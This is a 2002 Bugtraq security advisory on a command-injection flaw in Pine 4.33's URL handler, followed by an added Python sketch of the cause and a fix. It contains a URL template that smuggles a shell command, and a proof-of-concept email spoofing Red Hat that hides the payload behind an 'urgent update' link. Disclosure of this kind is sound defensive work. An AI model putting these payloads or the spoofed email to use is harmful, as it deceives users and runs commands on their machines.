Bugtraq mailing list archives
Pine 4.33 (at least) URL handler allows embedded commands.
From: zen-parse <zen-parse () gmx net>
Date: Sat, 5 Jan 2002 15:17:16 +1300 (NZDT)
Systems: Pine 4.33 (under Redhat 7.0)
(Probably many others, haven't checked much)
Vendors notified: Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
And again: Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
And again: Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)
Problem: URL handler allows embedded commands.
May allow email viruses of the Outlook kind.
Severity: Extremely Low -> Very High (Dependent on current
email reading habits)
Workaround: Don't view URLs from inside Pine.
(ObSpam: Except for http://mp3.com/cosv/ ;])
Details:
This is a similar problem to the xchat 1.4.1 URL handler vulnerability.
http://www.securityfocus.com/bid/1601
In Pine, if a user selects a URL of the form
http://address/'&/some/program${IFS}with${IFS}arguments&'
and URL handlers are installed, they will end up with the browser open
on
http://address/
and
/some/program with arguments
will get executed.
If you are reading your email as root these commands will execute as
root. (Create an alias for root to a non-privileged user instead of
reading mail as root.)
If you are reading your email as a non-privileged user, the impact is
somewhat lower, although local exploits could be run on the computer, or
Outlook style email viruses could be executed.
If you don't view links given to you in Pine, the impact from this
problem is non-existent.
It is possible to obfuscate the URL by putting it in an HTML message
such as the following.
----Begin html email----
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12
<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>
<a
href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/">
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>
This link contains PINE update information. <p>
You are advised to perform this immediately. <p>
The link also contains other urgent update information. <p>
</BODY>
</HTML>
----End html email----
Which would appear something like
----Begin view of email----
Date: Mon, 22 Oct 2001 13:34:40 +1300
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Urgent update:
PINE allows execution of arbitrary commands.
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/
This link contains PINE update information.
You are advised to perform this immediately.
The link also contains other urgent update information.
----End view of email----
When this link is selected to follow, Pine changes the status/menu lines
to read:
View selected URL "http://updates.redhat.com/update_information/urgent/r..." ?
Y [Yes] U editURL
N No A editApp
Which appears to match the url in the email. This probably makes detection
of this kind of exploit attempt harder.
-- zen-parse
[ A (relatively) safe way to visit http://mp3.com/cosv is to type the
address into the address bar of the browser you are using. Contrary to a
rumour posted several days ago, the only way I get any money from this
site is through CD purchases. If you want to, visit the site and listen
to the music. If you like it, you might want to buy it, or not. I hope
nobody has any illusion of being tricked into visiting. ]
--
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse () gmx net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
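
[Added example, not part of the original post and not Pine's code: a Python sketch of why a URL of the shape described above splits into several shell words, and how percent-encoding plus an argv-style launch keeps it as one argument. It assumes the handler command line is built by pasting the URL between single quotes; the template, the handler name "browser", the sample URL and all function names are hypothetical.]

```python
import shlex
from urllib.parse import quote

# Constructed URL with the same shape as the one in the advisory; the host,
# path and command name are placeholders.
SAMPLE_URL = "http://example.test/info/';example-command${IFS}arg;'/"

# ASSUMPTION: the handler command line is built from a template like this one.
TEMPLATE = "browser '{url}'"


def shell_words(command_line):
    """Tokenize as a POSIX shell would, keeping ; & | as operators. Runs nothing."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""  # '#' is legal inside a URL, do not treat it as a comment
    return list(lexer)


def naive_command(url):
    """Vulnerable pattern: the untrusted URL is pasted between single quotes."""
    return TEMPLATE.format(url=url)


def encode_for_handler(url):
    """Percent-encode everything except unreserved characters and the URL
    delimiters that are inert inside single quotes; ' becomes %27."""
    return quote(url, safe=":/?#[]@!&()*+,;=%")


def hardened_argv(url, browser="browser"):
    """Preferred fix: an argv list for an exec-style launch, with no shell involved."""
    return [browser, encode_for_handler(url)]


if __name__ == "__main__":
    print("naive   :", shell_words(naive_command(SAMPLE_URL)))
    print("encoded :", shell_words(naive_command(encode_for_handler(SAMPLE_URL))))
    print("argv    :", hardened_argv(SAMPLE_URL))
```
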
